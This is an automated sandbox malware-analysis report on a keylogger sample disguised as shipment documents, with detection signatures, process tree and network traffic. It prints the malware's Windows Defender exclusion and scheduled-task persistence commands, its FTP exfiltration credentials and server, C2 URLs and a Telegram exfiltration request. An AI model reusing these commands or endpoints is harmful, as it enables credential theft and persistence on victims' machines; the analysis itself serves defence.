Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rShipmentDocuments.exe

Overview

General Information

Sample name:rShipmentDocuments.exe
Analysis ID:1531471
MD5:ff8c4ab4ec18f05864879323f4a41050
SHA1:6552329870d1a2627b5e9b6b6cfd3d2efea87735
SHA256:db4523c5fa05acf8d6c8d47c722a5c39a728078f94a7f6877faa0a6fb87afc33
Tags:exeSnakeKeyloggeruser-Porcupine
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rShipmentDocuments.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\rShipmentDocuments.exe" MD5: FF8C4AB4EC18F05864879323F4A41050)
    • powershell.exe (PID: 7488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7904 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7616 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rShipmentDocuments.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\rShipmentDocuments.exe" MD5: FF8C4AB4EC18F05864879323F4A41050)
    • rShipmentDocuments.exe (PID: 7768 cmdline: "C:\Users\user\Desktop\rShipmentDocuments.exe" MD5: FF8C4AB4EC18F05864879323F4A41050)
  • ZOlmYtPdlO.exe (PID: 7824 cmdline: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe MD5: FF8C4AB4EC18F05864879323F4A41050)
    • schtasks.exe (PID: 8072 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ZOlmYtPdlO.exe (PID: 8120 cmdline: "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe" MD5: FF8C4AB4EC18F05864879323F4A41050)
    • ZOlmYtPdlO.exe (PID: 8128 cmdline: "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe" MD5: FF8C4AB4EC18F05864879323F4A41050)
    • ZOlmYtPdlO.exe (PID: 8136 cmdline: "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe" MD5: FF8C4AB4EC18F05864879323F4A41050)
  • cleanup

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "FTP", "Username": "Soma@hulonqgroup.com", "Password": "TNwhAkO^1&lZ", "FTP Server": "ftp://185.230.141.85/", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000009.00000002.4134245226.0000000000423000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0xd6c3:$a1: get_encryptedPassword
      • 0xd9e0:$a2: get_encryptedUsername
      • 0xd4d3:$a3: get_timePasswordChanged
      • 0xd5dc:$a4: get_passwordField
      • 0xd6d9:$a5: set_encryptedPassword
      • 0xed7a:$a7: get_logins
      • 0xecdd:$a10: KeyLoggerEventArgs
      • 0xe942:$a11: KeyLoggerEventArgsEventHandler
      00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 27 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.rShipmentDocuments.exe.44114f8.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.rShipmentDocuments.exe.44114f8.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.rShipmentDocuments.exe.44114f8.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.rShipmentDocuments.exe.44114f8.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2cac3:$a1: get_encryptedPassword
                • 0x2cde0:$a2: get_encryptedUsername
                • 0x2c8d3:$a3: get_timePasswordChanged
                • 0x2c9dc:$a4: get_passwordField
                • 0x2cad9:$a5: set_encryptedPassword
                • 0x2e17a:$a7: get_logins
                • 0x2e0dd:$a10: KeyLoggerEventArgs
                • 0x2dd42:$a11: KeyLoggerEventArgsEventHandler
                0.2.rShipmentDocuments.exe.44114f8.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3a860:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x39f03:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x3a160:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3ab3f:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 51 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rShipmentDocuments.exe", ParentImage: C:\Users\user\Desktop\rShipmentDocuments.exe, ParentProcessId: 7300, ParentProcessName: rShipmentDocuments.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", ProcessId: 7488, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rShipmentDocuments.exe", ParentImage: C:\Users\user\Desktop\rShipmentDocuments.exe, ParentProcessId: 7300, ParentProcessName: rShipmentDocuments.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", ProcessId: 7488, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe, ParentImage: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe, ParentProcessId: 7824, ParentProcessName: ZOlmYtPdlO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp", ProcessId: 8072, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rShipmentDocuments.exe", ParentImage: C:\Users\user\Desktop\rShipmentDocuments.exe, ParentProcessId: 7300, ParentProcessName: rShipmentDocuments.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp", ProcessId: 7616, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rShipmentDocuments.exe", ParentImage: C:\Users\user\Desktop\rShipmentDocuments.exe, ParentProcessId: 7300, ParentProcessName: rShipmentDocuments.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe", ProcessId: 7488, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rShipmentDocuments.exe", ParentImage: C:\Users\user\Desktop\rShipmentDocuments.exe, ParentProcessId: 7300, ParentProcessName: rShipmentDocuments.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp", ProcessId: 7616, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-11T09:35:20.420242+020028033053Unknown Traffic192.168.2.449738188.114.96.3443TCP
                2024-10-11T09:35:21.683879+020028033053Unknown Traffic192.168.2.449741188.114.96.3443TCP
                2024-10-11T09:35:22.078082+020028033053Unknown Traffic192.168.2.449742188.114.96.3443TCP
                2024-10-11T09:35:23.033039+020028033053Unknown Traffic192.168.2.449745188.114.96.3443TCP
                2024-10-11T09:35:23.360136+020028033053Unknown Traffic192.168.2.449746188.114.96.3443TCP
                2024-10-11T09:35:24.346686+020028033053Unknown Traffic192.168.2.449749188.114.96.3443TCP
                2024-10-11T09:35:29.560790+020028033053Unknown Traffic192.168.2.449765188.114.96.3443TCP
                2024-10-11T09:35:30.000137+020028033053Unknown Traffic192.168.2.449766188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-11T09:35:17.205286+020028032742Potentially Bad Traffic192.168.2.449733132.226.247.7380TCP
                2024-10-11T09:35:19.911334+020028032742Potentially Bad Traffic192.168.2.449733132.226.247.7380TCP
                2024-10-11T09:35:20.642777+020028032742Potentially Bad Traffic192.168.2.449737132.226.247.7380TCP
                2024-10-11T09:35:21.299031+020028032742Potentially Bad Traffic192.168.2.449739132.226.247.7380TCP
                2024-10-11T09:35:21.549600+020028032742Potentially Bad Traffic192.168.2.449737132.226.247.7380TCP
                2024-10-11T09:35:22.814729+020028032742Potentially Bad Traffic192.168.2.449744132.226.247.7380TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "Soma@hulonqgroup.com", "Password": "TNwhAkO^1&lZ", "FTP Server": "ftp://185.230.141.85/", "Version": "4.4"}
                Multi AV Scanner detection for domain / URL
                Source: http://varders.kozow.com:8081Virustotal: Detection: 14%Perma Link
                Source: http://aborters.duckdns.org:8081Virustotal: Detection: 13%Perma Link
                Source: http://51.38.247.67:8081/_send_.php?LVirustotal: Detection: 7%Perma Link
                Source: http://anotherarmy.dns.army:8081Virustotal: Detection: 17%Perma Link
                Source: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedVirustotal: Detection: 7%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeReversingLabs: Detection: 28%
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeVirustotal: Detection: 37%Perma Link
                Multi AV Scanner detection for submitted file
                Source: rShipmentDocuments.exeVirustotal: Detection: 37%Perma Link
                Source: rShipmentDocuments.exeReversingLabs: Detection: 28%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: rShipmentDocuments.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: rShipmentDocuments.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
                Source: rShipmentDocuments.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 02A3F45Dh9_2_02A3F2C0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 02A3F45Dh9_2_02A3F4AC
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 02A3FC19h9_2_02A3F961
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068F31E8h9_2_068F2DD0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068FF661h9_2_068FF3B8
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068F0D0Dh9_2_068F0B30
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068F1697h9_2_068F0B30
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068F2C21h9_2_068F2970
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068FE959h9_2_068FE6B0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068FE0A9h9_2_068FDE00
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_068F0673
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068FF209h9_2_068FEF60
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068FCF49h9_2_068FCCA0
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068F31E8h9_2_068F2DCA
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068FD7F9h9_2_068FD550
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068FE501h9_2_068FE258
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068FEDB1h9_2_068FEB08
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068FD3A1h9_2_068FD0F8
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068FFAB9h9_2_068FF810
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_068F0040
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_068F0853
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068FDC51h9_2_068FD9A8
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeCode function: 4x nop then jmp 068F31E8h9_2_068F3116
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 069C9E1Dh10_2_069CA0A0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 0303F45Dh16_2_0303F2C0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 0303F45Dh16_2_0303F4AC
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 0303FC19h16_2_0303F961
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D8F661h16_2_06D8F3B8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D80D0Dh16_2_06D80B30
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D81697h16_2_06D80B30
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D831E0h16_2_06D82DC8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D82C19h16_2_06D82968
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D8E959h16_2_06D8E6B0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D8E501h16_2_06D8E258
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h16_2_06D80673
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D8E0A9h16_2_06D8DE00
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D8F209h16_2_06D8EF60
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D8EDB1h16_2_06D8EB08
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D8D3A1h16_2_06D8D0F8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D8CF49h16_2_06D8CCA0
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h16_2_06D80853
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h16_2_06D80040
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D8FAB9h16_2_06D8F810
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D831E0h16_2_06D82DC3
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D8DC51h16_2_06D8D9A8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D8D7F9h16_2_06D8D550
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeCode function: 4x nop then jmp 06D831E0h16_2_06D8310E

                Networking

                barindex
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.4:49205 -> 185.230.141.85:49693
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:40:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:30:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: HostingvpsvilleruRU HostingvpsvilleruRU
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 132.226.247.73:80
